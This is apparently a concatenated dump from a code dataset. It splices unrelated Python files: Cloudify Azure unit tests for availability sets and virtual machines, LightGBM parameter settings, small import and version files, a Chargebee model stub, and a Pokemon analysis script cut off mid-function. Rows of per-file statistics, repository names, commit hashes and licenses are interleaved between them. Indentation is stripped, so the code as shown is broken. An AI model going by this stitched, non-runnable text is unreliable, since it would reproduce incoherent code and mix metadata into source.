@mock.patch('azure_sdk.common.ClientSecretCredential')
@mock.patch('azure_sdk.resources.compute.'
'availability_set.ComputeManagementClient')
class AvailabilitySetTest(unittest.TestCase):
def _get_mock_context_for_run(self, operation=None):
operation = operation or {
'name': 'cloudify.interfaces.lifecycle.create'}
fake_ctx = cfy_mocks.MockCloudifyContext(operation=operation)
instance = mock.Mock()
instance.runtime_properties = {}
instance.relationships = []
fake_ctx._instance = instance
node = mock.Mock()
fake_ctx._node = node
node.properties = {
'use_external_resource': False,
'create_if_missing': False,
'use_if_exists': False,
}
node.runtime_properties = {}
node.type_hierarchy = ['ctx.nodes.Root']
fake_ctx.get_resource = mock.MagicMock(
return_value=""
)
return fake_ctx, node, instance
def setUp(self):
self.fake_ctx, self.node, self.instance = \
self._get_mock_context_for_run()
self.dummy_azure_credentials = {
'client_id': 'dummy',
'client_secret': 'dummy',
'subscription_id': 'dummy',
'tenant_id': 'dummy'
}
def test_create(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockavailset'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['resource_config'] = {
'platformUpdateDomainCount': 1,
'platformFaultDomainCount': 2
}
availability_set_conf = {
'location': self.node.properties.get('location'),
'platform_update_domain_count': 1,
'platform_fault_domain_count': 2
}
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().availability_sets.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.create(ctx=self.fake_ctx)
client().availability_sets.get.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name
)
client().availability_sets.create_or_update.assert_called_with(
resource_group_name=resource_group,
name=name,
parameters=availability_set_conf
)
def test_create_already_exists(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockavailset'
self.node.properties['use_external_resource'] = True
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['resource_config'] = {
'platformUpdateDomainCount': 1,
'platformFaultDomainCount': 2
}
client().availability_sets.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.create(ctx=self.fake_ctx)
client().availability_sets.get.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name
)
client().availability_sets.create_or_update.assert_not_called()
def test_delete(self, client, credentials):
resource_group = 'sample_resource_group'
name = 'mockavailset'
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
current_ctx.set(ctx=fake_ctx)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.delete(ctx=fake_ctx)
client().availability_sets.delete.assert_called_with(
resource_group_name=resource_group,
availability_set_name=name)
def test_delete_do_not_exist(self, client, credentials):
resource_group = 'sample_resource_group'
name = 'mockavailset'
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().availability_sets.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
availabilityset.delete(ctx=fake_ctx)
client().availability_sets.delete.assert_not_called()
@mock.patch('azure_sdk.common.ClientSecretCredential')
@mock.patch('azure_sdk.resources.compute.'
'virtual_machine.ComputeManagementClient')
class VirtualMachineTest(unittest.TestCase):
def _get_mock_context_for_run(self, operation=None):
operation = operation or {
'name': 'cloudify.interfaces.lifecycle.create'}
fake_ctx = cfy_mocks.MockCloudifyContext(operation=operation)
instance = mock.Mock()
instance.runtime_properties = {}
instance.relationships = {}
fake_ctx._instance = instance
node = mock.Mock()
fake_ctx._node = node
node.properties = {}
node.type_hierarchy = []
node.runtime_properties = {}
node.type_hierarchy = ['ctx.nodes.Root', constants.COMPUTE_NODE_TYPE]
fake_ctx.get_resource = mock.MagicMock(
return_value=""
)
current_ctx.set(fake_ctx)
return fake_ctx, node, instance
def setUp(self):
self.fake_ctx, self.node, self.instance = \
self._get_mock_context_for_run()
self.dummy_azure_credentials = {
'client_id': 'dummy',
'client_secret': 'dummy',
'subscription_id': 'dummy',
'tenant_id': 'dummy'
}
@mock.patch('cloudify_azure.resources.compute.virtualmachine.'
'virtualmachine.build_network_profile',
side_effect=return_none)
def test_create(self, _, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2',
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
storage_profile = {
'os_disk': {
'caching': 'ReadWrite',
'vhd': {
'uri': 'http://None.blob./vhds/mockvm.vhd'
},
'name': 'mockvm',
'create_option': 'FromImage'
}
}
vm_params = {
'location': self.node.properties.get('location'),
'storageProfile': storage_profile,
}
vm_params = utils.handle_resource_config_params(
vm_params,
self.node.properties.get("resource_config")
)
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().virtual_machines.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
client()\
.virtual_machines.begin_create_or_update.assert_called_with(
resource_group_name=resource_group,
vm_name=name,
parameters=vm_params
)
self.assertEquals(
self.fake_ctx.instance.runtime_properties.get("name"),
name
)
self.assertEquals(
self.fake_ctx.instance.runtime_properties.get(
"resource_group"),
resource_group
)
def test_create_already_exists(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['use_external_resource'] = True
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2',
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
client().virtual_machines.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
# client().virtual_machines.create_or_update.assert_not_called()
def test_create_with_external_resource(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.node.properties['resource_group_name'] = resource_group
self.node.properties['name'] = name
self.node.properties['location'] = 'eastus'
self.node.properties['os_family'] = 'linux'
self.node.properties['resource_config'] = {
'hardwareProfile': {
'vmSize': 'Standard_A2'
},
'storageProfile': {
'imageReference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '14.04.4-LTS',
'version': '14.04.201604060'
}
},
'osProfile': {
'computerName': name,
'adminUsername': 'cloudify',
'adminPassword': 'Cl0ud1fy!',
'linuxConfiguration': {
'ssh': {
'publicKeys': {
'path': '/home/cloudify/.ssh/authorized_keys',
'keyData': 'ssh-rsa AAAAA3----MOCK----aabbzz'
}
},
'disablePasswordAuthentication': True
}
}
}
self.node.properties['use_external_resource'] = True
client().virtual_machines.get.return_value = mock.Mock()
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.create(ctx=self.fake_ctx)
client().virtual_machines.get.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
client()\
.virtual_machines.begin_create_or_update.assert_not_called()
def test_delete(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.delete'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.delete(ctx=fake_ctx)
client().virtual_machines.begin_delete.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
def test_delete_do_not_exist(self, client, credentials):
self.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
self.instance.runtime_properties['resource_group'] = resource_group
self.instance.runtime_properties['name'] = name
response = requests.Response()
response.status_code = 404
message = 'resource not found'
client().virtual_machines.get.side_effect = \
CloudError(response, message)
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.delete(ctx=self.fake_ctx)
client().virtual_machines.begin_delete.assert_not_called()
def test_start(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.start'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/stopped'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with self.assertRaisesRegexp(
OperationRetry, 'Waiting for PowerState/running status'):
virtualmachine.start(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_start.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
def test_start_started(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.start'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/running'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
virtualmachine.start(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_start.assert_not_called()
def test_stopped(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.stop'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/deallocated'}]}
}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
virtualmachine.stop(ctx=fake_ctx)
client().virtual_machines.begin_power_off.assert_not_called()
def test_stop(self, client, credentials):
fake_ctx, _, __ = self._get_mock_context_for_run(
operation={'name': 'cloudify.interfaces.lifecycle.stop'})
fake_ctx.node.properties['azure_config'] = self.dummy_azure_credentials
resource_group = 'sample_resource_group'
name = 'mockvm'
fake_ctx.instance.runtime_properties['resource_group'] = resource_group
fake_ctx.instance.runtime_properties['name'] = name
response = mock.MagicMock()
response.status_code = 200
message = {
'instance_view': {'statuses': [{'code': 'PowerState/running'}]}}
response.as_dict.return_value = message
client().virtual_machines.get.return_value = response
with mock.patch('cloudify_azure.utils.secure_logging_content',
mock.Mock()):
with self.assertRaisesRegexp(
OperationRetry,
'Waiting for {} PowerState/deallocated status'.format(name)
):
virtualmachine.stop(
command_to_execute='', file_uris=[], ctx=fake_ctx)
client().virtual_machines.begin_power_off.assert_called_with(
resource_group_name=resource_group,
vm_name=name
)
| 42.361111
| 79
| 0.598173
| 2,050
| 21,350
| 5.937561
| 0.123415
| 0.08117
| 0.051758
| 0.032862
| 0.86584
| 0.85023
| 0.841439
| 0.824351
| 0.808084
| 0.790338
| 0
| 0.007215
| 0.298876
| 21,350
| 503
| 80
| 42.445328
| 0.805932
| 0.030585
| 0
| 0.68559
| 0
| 0
| 0.198965
| 0.096316
| 0
| 0
| 0
| 0
| 0.045852
| 1
| 0.039301
| false
| 0.0131
| 0.024017
| 0.002183
| 0.074236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e42cacaf60e7f61af2c2dc816e961b9d6e19100
| 100
|
py
|
Python
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 21
|
2018-11-16T20:45:13.000Z
|
2022-03-06T17:06:40.000Z
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 1
|
2019-09-17T12:04:08.000Z
|
2019-09-17T12:04:08.000Z
|
src/vk/settings/config.py
|
blan4/ImagesSimilarityDemo
|
f9b601e57c6c62654868833499fcdcd69142b232
|
[
"MIT"
] | 9
|
2019-04-05T22:40:25.000Z
|
2021-09-01T20:53:43.000Z
|
# -*- coding: utf-8 -*-
def info_path(owner_id):
return 'data/photos_{}.csv'.format(owner_id)
| 16.666667
| 48
| 0.64
| 15
| 100
| 4
| 0.866667
| 0.233333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011765
| 0.15
| 100
| 5
| 49
| 20
| 0.694118
| 0.21
| 0
| 0
| 0
| 0
| 0.233766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
7e912358eac7f0e191c2ca4ce8035e8e868b6828
| 1,028
|
py
|
Python
|
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | 1
|
2018-05-22T10:20:54.000Z
|
2018-05-22T10:20:54.000Z
|
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | null | null | null |
code_repository/tencent_ad_contest/tencent_contest/model/setting.py
|
zyoohv/zyoohv.github.io
|
54d949dd9efcc278041ff59ea1e0f923b17ccb7f
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python3
param_list = [
{
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'train_metric': True,
'num_leaves': 63,
'lambda_l1': 0,
'lambda_l2': 1,
# 'min_data_in_leaf': 100,
'min_child_weight': 50,
'learning_rate': 0.1,
'feature_fraction': 0.6,
'bagging_fraction': 0.7,
'bagging_freq': 1,
'verbose': 1,
# 'early_stopping_round': 50,
'num_iterations': 300,
# 'is_unbalance': True,
'num_threads': 30
},
]
params = \
{
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'train_metric': True,
'num_leaves': 63,
'lambda_l1': 0,
'lambda_l2': 1,
# 'min_data_in_leaf': 100,
'min_child_weight': 50,
'learning_rate': 0.05,
'feature_fraction': 0.6,
'bagging_fraction': 0.7,
'bagging_freq': 1,
'verbose': 1,
'early_stopping_round': 1000,
'num_iterations': 5000,
# 'is_unbalance': True,
'num_threads': -1
}
| 20.56
| 33
| 0.566148
| 126
| 1,028
| 4.309524
| 0.420635
| 0.051565
| 0.062615
| 0.077348
| 0.865562
| 0.773481
| 0.773481
| 0.773481
| 0.773481
| 0.773481
| 0
| 0.071887
| 0.242218
| 1,028
| 49
| 34
| 20.979592
| 0.62516
| 0.136187
| 0
| 0.65
| 0
| 0
| 0.46538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7ea5787c79ed5675c156d7049394d578be6b6172
| 131
|
py
|
Python
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 46
|
2020-07-15T08:55:31.000Z
|
2022-03-29T08:34:30.000Z
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 2
|
2021-02-09T06:53:50.000Z
|
2021-09-12T09:28:22.000Z
|
HMQ/networks/__init__.py
|
UniSerj/ai-research
|
79f0093c93408cc5dd7d3f56aafd7dc1f901421c
|
[
"Apache-2.0"
] | 13
|
2020-07-14T07:43:17.000Z
|
2022-01-17T14:44:47.000Z
|
from networks.factory import get_network_function
from networks.controller.network_controller import NetworkQuantizationController
| 43.666667
| 80
| 0.916031
| 14
| 131
| 8.357143
| 0.642857
| 0.205128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061069
| 131
| 2
| 81
| 65.5
| 0.95122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7eae5a96ae62a1530fceed6e11b4b55822f0182d
| 73
|
py
|
Python
|
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
chargebee_v2/models/content.py
|
armisael/chargebee-python
|
df01e80c8ed7ac8ed37ad985ce5a5682cba64c30
|
[
"MIT"
] | null | null | null |
from chargebee_v2.result import Result
class Content(Result):
pass
| 12.166667
| 38
| 0.767123
| 10
| 73
| 5.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.178082
| 73
| 5
| 39
| 14.6
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0e210d199d725642e7b849d5de8d3f922820d0bc
| 45
|
py
|
Python
|
mobie/__version__.py
|
mobie-org/mobie-utils-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 1
|
2020-03-03T01:33:06.000Z
|
2020-03-03T01:33:06.000Z
|
mobie/__version__.py
|
platybrowser/mmb-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 4
|
2020-05-15T09:27:59.000Z
|
2020-05-29T19:15:00.000Z
|
mobie/__version__.py
|
platybrowser/mmb-python
|
0281db2bf3726103b762a50e40849e30942dd6ec
|
[
"MIT"
] | 2
|
2020-06-08T07:06:01.000Z
|
2020-06-08T07:08:08.000Z
|
__version__ = "0.2.7"
SPEC_VERSION = "0.2.0"
| 15
| 22
| 0.644444
| 9
| 45
| 2.666667
| 0.555556
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0.133333
| 45
| 2
| 23
| 22.5
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0e23ae6485152f2482a8a345b02b469295049b35
| 34
|
py
|
Python
|
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | 1
|
2022-01-24T16:27:51.000Z
|
2022-01-24T16:27:51.000Z
|
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | null | null | null |
metric/__init__.py
|
JackFram/Neural-Flow
|
83cea7aa933fa9650b42271ba4205208814d047b
|
[
"Apache-2.0"
] | null | null | null |
from .TS import TopologySimilarity
| 34
| 34
| 0.882353
| 4
| 34
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e95c4aa380124467e62cf995674ef5c876474b6
| 86
|
py
|
Python
|
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
Test.py
|
junugi/YOLO-OT
|
d3aba435fd15f9a29ab6af906c48a110507f3813
|
[
"MIT"
] | null | null | null |
from YOT_Base import YOT_Base
class Test(YOT_Base):
def test(self):
pass
| 14.333333
| 29
| 0.674419
| 14
| 86
| 3.928571
| 0.642857
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 86
| 5
| 30
| 17.2
| 0.859375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
7ec7c2ae9299b9fd8e5d3e7342e69cca0322b06c
| 70
|
py
|
Python
|
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | null | null | null |
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | 6
|
2020-04-15T03:17:42.000Z
|
2020-06-01T21:06:47.000Z
|
cells_in_gel/__init__.py
|
jingexu/cells-in-gel
|
68e5b2d536f5c2bc66410e1d0a81bc46916652b5
|
[
"MIT"
] | 1
|
2022-02-09T18:19:54.000Z
|
2022-02-09T18:19:54.000Z
|
from . import preprocess
from . import properties
from . import batch
| 17.5
| 24
| 0.785714
| 9
| 70
| 6.111111
| 0.555556
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 70
| 3
| 25
| 23.333333
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7eef7daa6b3107d1744840c0708838d4e7f363eb
| 31
|
py
|
Python
|
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | 2
|
2018-03-15T20:39:58.000Z
|
2021-11-17T17:57:19.000Z
|
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | null | null | null |
phonygres/engine/__init__.py
|
shz/phonygres
|
966c8eb1d0be9f53e1c13f65935dd3e1aa50d886
|
[
"Unlicense"
] | null | null | null |
from .executor import execute
| 15.5
| 30
| 0.806452
| 4
| 31
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 31
| 1
| 31
| 31
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d07013650b48fbddda7c56255264117774ff41c
| 247,444
|
py
|
Python
|
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
analysis/analysis.py
|
aguerrero232/DataScienceGroupProject
|
f27bc29f5a3646d1e19474be821af08a347aecfe
|
[
"MIT"
] | null | null | null |
import loaddata
import pokemon_regression
import pokemon_stat_analysis
import pokemon_test_are_dragons_taller
import pokemon_normal_dist_and_actual_vals
separator_char = ", "
separator = '---------------------------------------------------------------'
tab: str = "\t"
def do_normal_dist_against_actual_values(options):
data_set, type_set, stat_set = options[0], options[1], options[2]
if data_set == "1": # all pokemon
set_name = "Pokemon"
modifier = ''
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.grass_types['total_points']
stat_stats = loaddata.grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['hp']
stat_stats = loaddata.grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['speed']
stat_stats = loaddata.grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['attack']
stat_stats = loaddata.grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['defense']
stat_stats = loaddata.grass_types['defense'].describe()
